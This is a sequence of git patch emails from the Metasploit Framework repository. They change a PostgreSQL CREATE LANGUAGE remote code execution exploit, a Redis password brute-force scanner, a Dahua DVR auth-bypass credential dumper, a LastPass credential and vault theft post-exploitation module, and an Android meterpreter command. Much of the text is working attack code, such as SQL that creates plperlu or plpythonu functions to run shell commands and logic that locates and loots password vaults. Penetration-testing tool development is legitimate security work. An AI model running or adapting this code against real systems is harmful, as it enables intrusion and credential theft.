[ ddns_service, ddns_server, ddns_port, ddns_domain, ddns_user, ddns_pass ] unless ddns_server.blank? && ddns_port.blank? && ddns_user.blank? && ddns_pass.blank? - ddns_table.print + if datastore['VERBOSE'] + ddns_table.print + end report_ddns_cred(ddns_server, ddns_port, ddns_user, ddns_pass) end end From 436ea85b18db69a5b152516bf8d84046aaa69bff Mon Sep 17 00:00:00 2001 From: Micheal Date: Tue, 5 Jan 2016 21:11:08 -0800 Subject: [PATCH 185/686] Further cleanup and fixes --- .../multi/postgres/postgres_createlang.rb | 194 ++++++++---------- 1 file changed, 89 insertions(+), 105 deletions(-) diff --git a/modules/exploits/multi/postgres/postgres_createlang.rb b/modules/exploits/multi/postgres/postgres_createlang.rb index acecd9ea0d..36455744c6 100644 --- a/modules/exploits/multi/postgres/postgres_createlang.rb +++ b/modules/exploits/multi/postgres/postgres_createlang.rb @@ -15,40 +15,40 @@ class Metasploit4 < Msf::Exploit::Remote # Creates an instance of this module. def initialize(info = {}) super(update_info(info, - 'Name' => 'PostgreSQL CREATE LANGUAGE Execution', - 'Description' => %q( - Some installations of Postgres 8 and 9 are configured to allow loading external scripting languages. - Most commonly this is Perl and Python. When enabled, command execution is possible on the host. - To execute system commands, loading the "untrusted" version of the language is necessary. - This requires a superuser. This is usually postgres. The execution should be platform-agnostic, - and has been tested on OS X, Windows, and Linux. + 'Name' => 'PostgreSQL CREATE LANGUAGE Execution', + 'Description' => %q( + Some installations of Postgres 8 and 9 are configured to allow loading external scripting languages. + Most commonly this is Perl and Python. When enabled, command execution is possible on the host. + To execute system commands, loading the "untrusted" version of the language is necessary. + This requires a superuser. This is usually postgres. The execution should be platform-agnostic, + and has been tested on OS X, Windows, and Linux. - This module attempts to load Perl or Python to execute system commands. As this dynamically loads - a scripting language to execute commands, it is not necessary to drop a file on the filesystem. + This module attempts to load Perl or Python to execute system commands. As this dynamically loads + a scripting language to execute commands, it is not necessary to drop a file on the filesystem. - Only Postgres 8 and up are supported. - ), - 'Author' => [ - 'Micheal Cottingham', # author of this module - 'midnitesnake', # the postgres_payload module that this is based on - ], - 'License' => MSF_LICENSE, - 'References' => [ - ['URL', 'http://www.postgresql.org/docs/current/static/sql-createlanguage.html'], - ['URL', 'http://www.postgresql.org/docs/current/static/plperl.html'], - ['URL', 'http://www.postgresql.org/docs/current/static/plpython.html'] - ], - 'Platform' => %w(linux unix win osx), - 'Payload' => { - 'PayloadType' => %w(cmd) - }, - 'Arch' => [ARCH_CMD], - 'Targets' => [ - ['Automatic', {}] - ], - 'DefaultTarget' => 0, - 'DisclosureDate' => 'Jan 1 2016') - ) + Only Postgres 8 and up are supported. + ), + 'Author' => [ + 'Micheal Cottingham', # author of this module + 'midnitesnake', # the postgres_payload module that this is based on + ], + 'License' => MSF_LICENSE, + 'References' => [ + ['URL', 'http://www.postgresql.org/docs/current/static/sql-createlanguage.html'], + ['URL', 'http://www.postgresql.org/docs/current/static/plperl.html'], + ['URL', 'http://www.postgresql.org/docs/current/static/plpython.html'] + ], + 'Platform' => %w(linux unix win osx), + 'Payload' => { + 'PayloadType' => %w(cmd) + }, + 'Arch' => [ARCH_CMD], + 'Targets' => [ + ['Automatic', {}] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Jan 1 2016') + ) register_options([ OptString.new('USERNAME', [true, 'The username to the service', 'postgres']), @@ -69,12 +69,12 @@ class Metasploit4 < Msf::Exploit::Remote return CheckCode::Appears else - print_error 'Unsupported version' + print_error "#{rhost}:#{rport} - Unsupported version - #{version[:auth]}" return CheckCode::Safe end else - print_error "Authentication failed. #{version[:preauth] || version[:unknown]}" + print_error "#{rhost}:#{rport} - Authentication failed" return CheckCode::Safe end end @@ -83,16 +83,16 @@ class Metasploit4 < Msf::Exploit::Remote version = do_login(username, password, database) case version - when :noauth - print_error 'Authentication failed.' - return + when :noauth + print_error "#{rhost}:#{rport} - Authentication failed" + return - when :noconn - print_error 'Connection failed.' - return + when :noconn + print_error "#{rhost}:#{rport} - Connection failed" + return - else - print_status "#{rhost}:#{rport} - #{version}" + else + print_status "#{rhost}:#{rport} - #{version}" end version_match = version.match(/(?\w{10})\s(?\d{1,2})\.(?\d{1,2})\.(?\d{1,2})/) @@ -100,15 +100,15 @@ class Metasploit4 < Msf::Exploit::Remote extension = 'LANGUAGE' if major_version.to_i == 8 - print_status 'Selecting version 8 payload' + print_status "#{rhost}:#{rport} - Selecting version 8 attack" extension = 'LANGUAGE' elsif major_version.to_i >= 9 - print_status 'Selecting version 9 payload' - extension = 'EXTENSION' + print_status "#{rhost}:#{rport} - Selecting version 9 attack" + extension = 'LANGUAGE' else - print_error 'Unsupported version - exploit failed' + print_error "#{rhost}:#{rport} - Unsupported version - #{version}" return false end @@ -123,27 +123,27 @@ class Metasploit4 < Msf::Exploit::Remote languages.each do |language| load_lang = create_language(language, extension) - human_language = language.capitalize.to_s + human_language = language.capitalize - print_status "Attempting to load #{human_language}" + print_status "#{rhost}:#{rport} - Attempting to load #{human_language}" case load_lang - when 'exists' - print_good "#{human_language} is already loaded, continuing" - create_function(language, func_name) - loaded = true + when :exists + print_good "#{rhost}:#{rport} - #{human_language} is already loaded, continuing" + create_function(language, func_name) + loaded = true - when 'loaded' - print_good "#{human_language} was successfully loaded, continuing" - create_function(language, func_name) - loaded = true + when :loaded + print_good "#{rhost}:#{rport} - #{human_language} was successfully loaded, continuing" + create_function(language, func_name) + loaded = true - when 'not_exists' - print_status "#{human_language} could not be loaded" + when :not_exists + print_status "#{rhost}:#{rport} - #{human_language} could not be loaded" - else - print_error 'No exploit path found' - return false + else + print_error "#{rhost}:#{rport} - Error occurred" + return false end break if loaded @@ -156,23 +156,24 @@ class Metasploit4 < Msf::Exploit::Remote select_query = postgres_query("SELECT exec_#{func_name}('#{payload.encoded.gsub("'", "''")}')") case select_query.keys[0] - when :conn_error - print_error "#{rhost}:#{rport} Postgres - Authentication failure, could not connect." + when :conn_error + print_error "#{rhost}:#{rport} - Connection error" - when :sql_error - print_error "Exploit failed" - return false + when :sql_error + print_error "#{rhost}:#{rport} - Exploit failed" + return false - when :complete - print_good 'Starting payload' + when :complete + print_good "#{rhost}:#{rport} - Exploit successful" end else + print_error "#{rhost}:#{rport} - Exploit failed" return false end rescue RuntimeError => e - print_error "Failed to create UDF: #{e.class}: #{e}" + print_error "#{rhost}:#{rport} - Failed to create UDF: #{e.class}: #{e}" end postgres_logout if @postgres_conn @@ -182,66 +183,51 @@ class Metasploit4 < Msf::Exploit::Remote load_func = '' case language - when 'perl' - load_func = postgres_query("CREATE OR REPLACE FUNCTION exec_#{func_name}(text) RETURNS void as $$" \ + when 'perl' + load_func = postgres_query("CREATE OR REPLACE FUNCTION exec_#{func_name}(text) RETURNS void as $$" \ "`$_[0]`;" \ "$$ LANGUAGE pl#{language}u") - # Ruby doesn't do case folding ... :/ - when 'python' - load_func = postgres_query("CREATE OR REPLACE FUNCTION exec_#{func_name}(c text) RETURNS void as $$\r" \ + when /^python(?:2|3)?/i + load_func = postgres_query("CREATE OR REPLACE FUNCTION exec_#{func_name}(c text) RETURNS void as $$\r" \ "import subprocess, shlex\r" \ "subprocess.check_output(shlex.split(c))\r" \ "$$ LANGUAGE pl#{language}u") - - when 'python2' - load_func = postgres_query("CREATE OR REPLACE FUNCTION exec_#{func_name}(c text) RETURNS void as $$\r" \ - "import subprocess, shlex\r" \ - "subprocess.check_output(shlex.split(c))\r" \ - "$$ LANGUAGE pl#{language}u") - - when 'python3' - load_func = postgres_query("CREATE OR REPLACE FUNCTION exec_#{func_name}(c text) RETURNS void as $$\r" \ - "import subprocess, shlex\r" \ - "subprocess.check_output(shlex.split(c))\r" \ - "$$ LANGUAGE pl#{language}u") - - else - print_error 'Invalid language' end case load_func.keys[0] - when :conn_error - print_error "#{rhost}:#{rport} Postgres - Authentication failure, could not connect." + when :conn_error + print_error "#{rhost}:#{rport} - Connection error" - when :sql_error - print_error "#{rhost}:#{rport} Exploit failed" - return false + when :sql_error + print_error "#{rhost}:#{rport} Exploit failed" + return false - when :complete - print_good 'Loaded UDF' - end + when :complete + print_good "#{rhost}:#{rport} - Loaded UDF (exec_#{func_name})" + end end def create_language(language, extension) load_language = postgres_query("CREATE #{extension} pl#{language}u") if load_language.keys[0] == :sql_error - match_exists = load_language[:sql_error].match(/language "pl#{language}u" already exists/m) + + match_exists = load_language[:sql_error].match(/(?:(extension|language) "pl#{language}u" already exists)/m) if match_exists - return 'exists' + return :exists else - match_error = load_language[:sql_error].match(/(could not (open extension control|access) file|unsupported language)/m) + match_error = load_language[:sql_error].match(/(?:could not (?:open extension control|access) file|unsupported language)/m) if match_error - return 'not_exists' + return :not_exists end end else - return 'loaded' + return :loaded end end @@ -251,8 +237,6 @@ class Metasploit4 < Msf::Exploit::Remote begin password = pass || postgres_password - vprint_status("Trying #{user}:#{password}@#{rhost}:#{rport}/#{database}") - result = postgres_fingerprint( db: database, username: user, @@ -263,7 +247,7 @@ class Metasploit4 < Msf::Exploit::Remote return result[:auth] else - print_status("Login failed, fingerprint is #{result[:preauth] || result[:unknown]}") + print_status "#{rhost}:#{rport} - Login failed" return :noauth end From a54a7aeb0239203ea4983f5aa99abddef8fd1f0a Mon Sep 17 00:00:00 2001 From: nixawk Date: Wed, 6 Jan 2016 17:05:49 +0800 Subject: [PATCH 186/686] redis only need password for authentication --- modules/auxiliary/scanner/redis/redis_login.rb | 12 +++++------- 1 file changed, 5 insertions(+), 7 deletions(-) diff --git a/modules/auxiliary/scanner/redis/redis_login.rb b/modules/auxiliary/scanner/redis/redis_login.rb index 8b9df05ebd..626efb5136 100644 --- a/modules/auxiliary/scanner/redis/redis_login.rb +++ b/modules/auxiliary/scanner/redis/redis_login.rb @@ -35,10 +35,9 @@ class Metasploit3 < Msf::Auxiliary File.join(Msf::Config.install_root, 'data', 'wordlists', 'unix_passwords.txt') ]) ], self.class) - end - def target - "#{rhost}:#{rport}" + # redis does not have an username, there's only password + deregister_options('USERNAME', 'USER_AS_PASS', 'USERPASS_FILE', 'USER_FILE', 'DB_ALL_USERS') end def run_host(ip) @@ -46,10 +45,9 @@ class Metasploit3 < Msf::Auxiliary blank_passwords: datastore['BLANK_PASSWORDS'], pass_file: datastore['PASS_FILE'], password: datastore['PASSWORD'], - user_file: datastore['USER_FILE'], - userpass_file: datastore['USERPASS_FILE'], - username: datastore['USERNAME'], - user_as_pass: datastore['USER_AS_PASS'] + # The LoginScanner API refuses to run if there's no username, so we give it a fake one. + # But we will not be reporting this to the database. + username: 'redis' ) cred_collection = prepend_db_passwords(cred_collection) From c245e64239ba1fbe49209d08c58965aa7d93ca8b Mon Sep 17 00:00:00 2001 From: Tyler Bennett Date: Wed, 6 Jan 2016 13:22:30 -0500 Subject: [PATCH 187/686] added peer to each print statement and rex table --- .../scanner/misc/dahua_dvr_auth_bypass.rb | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb index 5cd86586aa..310d4c4fd5 100644 --- a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb +++ b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb @@ -108,9 +108,9 @@ class Metasploit3 < Msf::Auxiliary print_good("#{peer} -- Email Settings:") return unless data.first =~ /([\x00]{8,}(?=.{1,255}$)[0-9A-Z](?:(?:[0-9A-Z]|-){0,61}[0-9A-Z])?(?:\.[0-9A-Z](?:(?:[0-9A-Z]|-){0,61}[0-9A-Z])?)*\.?+:\d+)/i if mailhost = Regexp.last_match[1].split(':') - print_status(" Server: #{mailhost[0]}") unless mailhost[0].blank? - print_status(" Server Port: #{mailhost[1]}") unless mailhost[1].blank? - print_status(" Destination Email: #{data[1]}") unless data[1].blank? + print_status("#{peer} -- Server: #{mailhost[0]}") unless mailhost[0].blank? + print_status("#{peer} -- Server Port: #{mailhost[1]}") unless mailhost[1].blank? + print_status("#{peer} -- Destination Email: #{data[1]}") unless data[1].blank? mailserver = "#{mailhost[0]}" mailport = "#{mailhost[1]}" muser = "#{data[5]}" @@ -131,7 +131,7 @@ class Metasploit3 < Msf::Auxiliary ddns_table = Rex::Ui::Text::Table.new( 'Header' => 'Dahua DDNS Settings', 'Indent' => 1, - 'Columns' => ['DDNS Service', 'DDNS Server', 'DDNS Port', 'Domain', 'Username', 'Password'] + 'Columns' => ['Peer', 'DDNS Service', 'DDNS Server', 'DDNS Port', 'Domain', 'Username', 'Password'] ) data.each_with_index do |val, index| next if index == 0 @@ -142,7 +142,7 @@ class Metasploit3 < Msf::Auxiliary ddns_domain = val[3] ddns_user = val[4] ddns_pass = val[5] - ddns_table << [ ddns_service, ddns_server, ddns_port, ddns_domain, ddns_user, ddns_pass ] + ddns_table << [ peer, ddns_service, ddns_server, ddns_port, ddns_domain, ddns_user, ddns_pass ] unless ddns_server.blank? && ddns_port.blank? && ddns_user.blank? && ddns_pass.blank? if datastore['VERBOSE'] ddns_table.print @@ -167,10 +167,10 @@ class Metasploit3 < Msf::Auxiliary ftpuser.strip! ftppass.strip! unless ftpuser.blank? || ftppass.blank? - print_good(" NAS Server: #{server}") - print_good(" NAS Port: #{port}") - print_good(" FTP User: #{ftpuser}") - print_good(" FTP Pass: #{ftppass}") + print_good("#{peer} -- NAS Server: #{server}") + print_good("#{peer} -- NAS Port: #{port}") + print_good("#{peer} -- FTP User: #{ftpuser}") + print_good("#{peer} -- FTP Pass: #{ftppass}") report_creds( host: server, port: port, From e7701b6d5f17e7f049886e2fd0d652eec2fdf7f5 Mon Sep 17 00:00:00 2001 From: Martin Vigo Date: Thu, 7 Jan 2016 22:17:04 -0800 Subject: [PATCH 188/686] Fix incoherent method to always return a list --- modules/post/multi/gather/lastpass_creds.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/post/multi/gather/lastpass_creds.rb b/modules/post/multi/gather/lastpass_creds.rb index 4849006dfc..c908934e36 100644 --- a/modules/post/multi/gather/lastpass_creds.rb +++ b/modules/post/multi/gather/lastpass_creds.rb @@ -134,7 +134,7 @@ class Metasploit3 < Msf::Post account_map[account][browser] = {} db_paths = find_db_paths(path, browser, account) if db_paths && db_paths.size > 0 - account_map[account][browser]['lp_db_path'] = db_paths + account_map[account][browser]['lp_db_path'] = db_paths.first account_map[account][browser]['localstorage_db'] = localstorage_path_map[browser] if file_exists?(localstorage_path_map[browser]) || browser.match(/Firefox|IE/) account_map[account][browser]['cookies_db'] = cookies_path_map[browser] if file_exists?(cookies_path_map[browser]) || browser.match(/Firefox|IE/) account_map[account][browser]['cookies_db'] = account_map[account][browser]['lp_db_path'].first.gsub("prefs.js", "cookies.sqlite") if (!account_map[account][browser]['lp_db_path'].blank? && browser == 'Firefox') @@ -163,7 +163,7 @@ class Metasploit3 < Msf::Post end vprint_good "Found #{paths.size} #{browser} databases for #{account}" - return paths.size > 0 ? paths.first : [] + paths end # Returns the relevant information from user profiles From b46095f3d6915351e3882cc9c9701e48861eb777 Mon Sep 17 00:00:00 2001 From: Martin Vigo Date: Thu, 7 Jan 2016 22:21:10 -0800 Subject: [PATCH 189/686] Remove custom method checking file exists --- modules/post/multi/gather/lastpass_creds.rb | 26 ++++++--------------- 1 file changed, 7 insertions(+), 19 deletions(-) diff --git a/modules/post/multi/gather/lastpass_creds.rb b/modules/post/multi/gather/lastpass_creds.rb index c908934e36..9e0d2e7f04 100644 --- a/modules/post/multi/gather/lastpass_creds.rb +++ b/modules/post/multi/gather/lastpass_creds.rb @@ -135,8 +135,8 @@ class Metasploit3 < Msf::Post db_paths = find_db_paths(path, browser, account) if db_paths && db_paths.size > 0 account_map[account][browser]['lp_db_path'] = db_paths.first - account_map[account][browser]['localstorage_db'] = localstorage_path_map[browser] if file_exists?(localstorage_path_map[browser]) || browser.match(/Firefox|IE/) - account_map[account][browser]['cookies_db'] = cookies_path_map[browser] if file_exists?(cookies_path_map[browser]) || browser.match(/Firefox|IE/) + account_map[account][browser]['localstorage_db'] = localstorage_path_map[browser] if file?(localstorage_path_map[browser]) || browser.match(/Firefox|IE/) + account_map[account][browser]['cookies_db'] = cookies_path_map[browser] if file?(cookies_path_map[browser]) || browser.match(/Firefox|IE/) account_map[account][browser]['cookies_db'] = account_map[account][browser]['lp_db_path'].first.gsub("prefs.js", "cookies.sqlite") if (!account_map[account][browser]['lp_db_path'].blank? && browser == 'Firefox') else account_map[account].delete(browser) @@ -257,7 +257,7 @@ class Metasploit3 < Msf::Post # Extract master passwords path = localstorage_db_path + system_separator + "lp.loginpws" - data = read_remote_file(path) if file_exists?(path) # Read file if it exists + data = read_remote_file(path) if file?(path) # Read file if it exists end # Get encrypted master passwords @@ -347,7 +347,7 @@ class Metasploit3 < Msf::Post browser_map.each_pair do |browser, lp_data| if browser.match(/Firefox|IE/) path = lp_data['localstorage_db'] + system_separator + "lp.suid" - data = read_remote_file(path) if file_exists?(path) # Read file if it exists + data = read_remote_file(path) if file?(path) # Read file if it exists data = windows_unprotect(data) if data != nil && data.size > 32 # Verify Windows protection loot_path = loot_file(nil, data, "#{browser.downcase}.lastpass.localstorage", "application/x-sqlite3", "#{account}'s #{browser} LastPass localstorage #{lp_data['localstorage_db']}") account_map[account][browser]['lp_2fa'] = data @@ -401,14 +401,14 @@ class Metasploit3 < Msf::Post iterations_path = lp_data['localstorage_db'] + system_separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_key_ie.itr" vault_path = lp_data['localstorage_db'] + system_separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_lps.sxml" end - iterations = read_remote_file(iterations_path) if file_exists?(iterations_path) # Read file if it exists + iterations = read_remote_file(iterations_path) if file?(iterations_path) # Read file if it exists iterations = nil if iterations.blank? # Verify content lp_data['lp_creds'][username]['iterations'] = iterations # Find encrypted vault vault = read_remote_file(vault_path) vault = windows_unprotect(vault) if vault != nil && vault.match(/^AQAAA.+/) # Verify Windows protection - vault = vault.sub(/iterations=.*;/, "") if file_exists?(vault_path) # Remove iterations info + vault = vault.sub(/iterations=.*;/, "") if file?(vault_path) # Remove iterations info loot_path = loot_file(nil, vault, "#{browser.downcase}.lastpass.vault", "text/plain", "#{account}'s #{browser} LastPass vault") lp_data['lp_creds'][username]['vault_loot'] = loot_path @@ -549,7 +549,7 @@ class Metasploit3 < Msf::Post else # IE path = lp_data['localstorage_db'] + system_separator + OpenSSL::Digest::SHA256.hexdigest(username) + ".sotp" end - otpbin = read_remote_file(path) if file_exists?(path) # Read file if it exists + otpbin = read_remote_file(path) if file?(path) # Read file if it exists otpbin = windows_unprotect(otpbin) if otpbin != nil && otpbin.match(/^AQAAA.+/) return otpbin else # Chrome, Safari and Opera @@ -792,18 +792,6 @@ class Metasploit3 < Msf::Post return session.platform =~ /win/ ? '\\' : '/' end - # Returns if file exists in a session type agnostic way - def file_exists?(path) - if session.type == "meterpreter" - return client.fs.file.exists?(path) - elsif session.type == "shell" - return session.shell_command("ls \"#{path}\"").strip == path.strip - else - print_error "Session type not recognized: #{session.type}" - return nil - end - end - # Return directory content in a session type agnostic way def directory_entries(path) if directory?(path) From 8c6bdd532bc496b741e4b2cdb9130ea34191e1d5 Mon Sep 17 00:00:00 2001 From: Martin Vigo Date: Thu, 7 Jan 2016 22:50:23 -0800 Subject: [PATCH 190/686] Use ? for SQL queries --- modules/post/multi/gather/lastpass_creds.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/post/multi/gather/lastpass_creds.rb b/modules/post/multi/gather/lastpass_creds.rb index 9e0d2e7f04..f6a49b3e88 100644 --- a/modules/post/multi/gather/lastpass_creds.rb +++ b/modules/post/multi/gather/lastpass_creds.rb @@ -416,7 +416,7 @@ class Metasploit3 < Msf::Post db = SQLite3::Database.new(lp_data['lp_db_loot']) result = db.execute( "SELECT data FROM LastPassData " \ - "WHERE username_hash = '" + OpenSSL::Digest::SHA256.hexdigest(username) + "' AND type = 'accts'" + "WHERE username_hash = ? AND type = 'accts'", OpenSSL::Digest::SHA256.hexdigest(username) ) if result.size == 1 && !result[0].blank? @@ -556,7 +556,7 @@ class Metasploit3 < Msf::Post db = SQLite3::Database.new(lp_data['lp_db_loot']) result = db.execute( "SELECT type, data FROM LastPassData " \ - "WHERE username_hash = '" + OpenSSL::Digest::SHA256.hexdigest(username) + "' AND type = 'otp'" + "WHERE username_hash = ? AND type = 'otp'", OpenSSL::Digest::SHA256.hexdigest(username) ) return (result.blank? || result[0][1].blank?) ? nil : [result[0][1]].pack("H*") end @@ -779,7 +779,7 @@ class Metasploit3 < Msf::Post db = SQLite3::Database.new(lp_data['lp_db_loot']) result = db.execute( "SELECT data FROM LastPassData " \ - "WHERE username_hash = '" + OpenSSL::Digest::SHA256.hexdigest(username) + "' AND type = 'key'" + "WHERE username_hash = ? AND type = 'key'", OpenSSL::Digest::SHA256.hexdigest(username) ) encrypted_vault_key = result[0][0] end From ed99f2bc0124a49ab76928bfe92450e02ff72bb2 Mon Sep 17 00:00:00 2001 From: nixawk Date: Fri, 8 Jan 2016 22:22:00 +0800 Subject: [PATCH 191/686] Fix dns labels/names size limits --- lib/net/dns/names/names.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/net/dns/names/names.rb b/lib/net/dns/names/names.rb index d65c8bf293..60b3831351 100644 --- a/lib/net/dns/names/names.rb +++ b/lib/net/dns/names/names.rb @@ -46,8 +46,8 @@ module Net # :nodoc: end def pack_name(name) - if name.size > 63 - raise ArgumentError, "Label data cannot exceed 63 chars" + if name.size > 255 + raise ArgumentError, "Name data cannot exceed 255 chars" end arr = name.split(".") str = "" From 3bee2fff70dfc67808c7397344aaf5595eeb65fd Mon Sep 17 00:00:00 2001 From: Martin Vigo Date: Fri, 8 Jan 2016 16:06:24 -0800 Subject: [PATCH 192/686] Use native method dir --- modules/post/multi/gather/lastpass_creds.rb | 22 ++++----------------- 1 file changed, 4 insertions(+), 18 deletions(-) diff --git a/modules/post/multi/gather/lastpass_creds.rb b/modules/post/multi/gather/lastpass_creds.rb index f6a49b3e88..91afe5d444 100644 --- a/modules/post/multi/gather/lastpass_creds.rb +++ b/modules/post/multi/gather/lastpass_creds.rb @@ -171,7 +171,7 @@ class Metasploit3 < Msf::Post user_profiles = [] case session.platform when /unix|linux/ - user_names = directory_entries("/home") + user_names = dir("/home") user_names.reject! { |u| %w(. ..).include?(u) } user_names.each do |user_name| user_profiles.push('UserName' => user_name, "LocalAppData" => "/home/#{user_name}") @@ -199,7 +199,7 @@ class Metasploit3 < Msf::Post found_dbs_paths = [] files = [] - files = directory_entries(path) if directory?(path) + files = dir(path) if directory?(path) files.each do |file_path| unless %w(. .. Shared).include?(file_path) found_dbs_paths.push([path, file_path].join(system_separator)) @@ -214,7 +214,7 @@ class Metasploit3 < Msf::Post found_dbs_paths = [] if directory?(path) - files = directory_entries(path) + files = dir(path) files.reject! { |file| %w(. ..).include?(file) } files.each do |file_path| found_dbs_paths.push([path, file_path, 'prefs.js'].join(system_separator)) if file_path.match(/.*\.default/) @@ -467,7 +467,7 @@ class Metasploit3 < Msf::Post browser_map.each_pair do |browser, lp_data| if browser == "IE" - cookies_files = directory_entries(lp_data['cookies_db']) + cookies_files = dir(lp_data['cookies_db']) cookies_files.reject! { |u| %w(. ..).include?(u) } cookies_files.each do |cookie_jar_file| data = read_remote_file(lp_data['cookies_db'] + system_separator + cookie_jar_file) @@ -791,18 +791,4 @@ class Metasploit3 < Msf::Post def system_separator return session.platform =~ /win/ ? '\\' : '/' end - - # Return directory content in a session type agnostic way - def directory_entries(path) - if directory?(path) - if session.type == "meterpreter" - return client.fs.dir.entries(path) - elsif session.type == "shell" - return session.shell_command("ls \"#{path}\"").split - else - print_error "Session type not recognized: #{session.type}" - return nil - end - end - end end From dceb0f5ea928ada56b658f311e23c440b516687c Mon Sep 17 00:00:00 2001 From: nixawk Date: Sat, 9 Jan 2016 11:39:56 +0800 Subject: [PATCH 193/686] check dns labels size limits --- lib/net/dns/names/names.rb | 3 +++ 1 file changed, 3 insertions(+) diff --git a/lib/net/dns/names/names.rb b/lib/net/dns/names/names.rb index 60b3831351..b483368877 100644 --- a/lib/net/dns/names/names.rb +++ b/lib/net/dns/names/names.rb @@ -52,6 +52,9 @@ module Net # :nodoc: arr = name.split(".") str = "" arr.each do |elem| + if elem.size > 63 + raise ArgumentError, "Label data cannot exceed 63 chars" + end str += [elem.size,elem].pack("Ca*") end str += [0].pack("C") From f48e4363f5b521ee557250e4ad0d8dddeb962321 Mon Sep 17 00:00:00 2001 From: Tim Date: Thu, 7 Jan 2016 09:22:42 +0000 Subject: [PATCH 194/686] activity_start --- .../meterpreter/extensions/android/android.rb | 7 +++++++ .../post/meterpreter/extensions/android/tlv.rb | 3 +-- .../ui/console/command_dispatcher/android.rb | 17 +++++++++++++++-- 3 files changed, 23 insertions(+), 4 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/android/android.rb b/lib/rex/post/meterpreter/extensions/android/android.rb index 931b591708..a98ea5bd28 100644 --- a/lib/rex/post/meterpreter/extensions/android/android.rb +++ b/lib/rex/post/meterpreter/extensions/android/android.rb @@ -242,6 +242,13 @@ class Android < Extension response.get_tlv(TLV_TYPE_CHECK_ROOT_BOOL).value end + def activity_start(uri) + request = Packet.create_request('activity_start') + request.add_tlv(TLV_TYPE_URI_STRING, uri) + response = client.send_request(request) + response + end + def send_sms(dest, body, dr) request = Packet.create_request('send_sms') request.add_tlv(TLV_TYPE_SMS_ADDRESS, dest) diff --git a/lib/rex/post/meterpreter/extensions/android/tlv.rb b/lib/rex/post/meterpreter/extensions/android/tlv.rb index 99f269327d..9f434cfffa 100644 --- a/lib/rex/post/meterpreter/extensions/android/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/android/tlv.rb @@ -76,8 +76,7 @@ TLV_TYPE_CELL_BASE_LONG = TLV_META_TYPE_UINT | (TLV_EXTENSIONS TLV_TYPE_CELL_NET_ID = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 9073) TLV_TYPE_CELL_SYSTEM_ID = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 9074) - - +TLV_TYPE_URI_STRING = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9101) end end diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb index 8030c3329c..d72044d9ec 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb @@ -29,7 +29,8 @@ class Console::CommandDispatcher::Android 'device_shutdown' => 'Shutdown device', 'send_sms' => 'Sends SMS from target session', 'wlan_geolocate' => 'Get current lat-long using WLAN information', - 'interval_collect' => 'Manage interval collection capabilities' + 'interval_collect' => 'Manage interval collection capabilities', + 'activity_start' => 'Start an Android activity from a Uri string' } reqs = { @@ -41,7 +42,8 @@ class Console::CommandDispatcher::Android 'device_shutdown' => ['device_shutdown'], 'send_sms' => ['send_sms'], 'wlan_geolocate' => ['wlan_geolocate'], - 'interval_collect' => ['interval_collect'] + 'interval_collect' => ['interval_collect'], + 'activity_start' => ['activity_start'] } # Ensure any requirements of the command are met @@ -528,6 +530,17 @@ class Console::CommandDispatcher::Android end end + def cmd_activity_start(*args) + if (args.length < 1) + print_line("Usage: activity_start \n") + print_line("Start an Android activity from a uri") + return + end + + uri = args[0] + client.android.activity_start(uri) + end + # # Name for this dispatcher # From c76389629abd913edb6886af404cd442d9591d20 Mon Sep 17 00:00:00 2001 From: Tim Date: Tue, 12 Jan 2016 07:49:37 +0000 Subject: [PATCH 195/686] receive startActivity result --- lib/rex/post/meterpreter/extensions/android/android.rb | 2 +- lib/rex/post/meterpreter/extensions/android/tlv.rb | 1 + 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/lib/rex/post/meterpreter/extensions/android/android.rb b/lib/rex/post/meterpreter/extensions/android/android.rb index a98ea5bd28..32cc0f9af7 100644 --- a/lib/rex/post/meterpreter/extensions/android/android.rb +++ b/lib/rex/post/meterpreter/extensions/android/android.rb @@ -246,7 +246,7 @@ class Android < Extension request = Packet.create_request('activity_start') request.add_tlv(TLV_TYPE_URI_STRING, uri) response = client.send_request(request) - response + response.get_tlv(TLV_TYPE_ACTIVITY_START_RESULT).value end def send_sms(dest, body, dr) diff --git a/lib/rex/post/meterpreter/extensions/android/tlv.rb b/lib/rex/post/meterpreter/extensions/android/tlv.rb index 9f434cfffa..54cfa1488b 100644 --- a/lib/rex/post/meterpreter/extensions/android/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/android/tlv.rb @@ -77,6 +77,7 @@ TLV_TYPE_CELL_NET_ID = TLV_META_TYPE_UINT | (TLV_EXTENSIONS TLV_TYPE_CELL_SYSTEM_ID = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 9074) TLV_TYPE_URI_STRING = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9101) +TLV_TYPE_ACTIVITY_START_RESULT = TLV_META_TYPE_BOOL | (TLV_EXTENSIONS + 9102) end end From 1f61eb50bedf6494d6b3867a12e1141e1239b153 Mon Sep 17 00:00:00 2001 From: James Lee Date: Thu, 14 Jan 2016 09:09:29 -0600 Subject: [PATCH 196/686] Sort methods --- lib/msf/core/exploit/tcp.rb | 66 ++++++++++++++++++------------------- 1 file changed, 33 insertions(+), 33 deletions(-) diff --git a/lib/msf/core/exploit/tcp.rb b/lib/msf/core/exploit/tcp.rb index f4a6daef6c..7c342a3a03 100644 --- a/lib/msf/core/exploit/tcp.rb +++ b/lib/msf/core/exploit/tcp.rb @@ -82,11 +82,6 @@ module 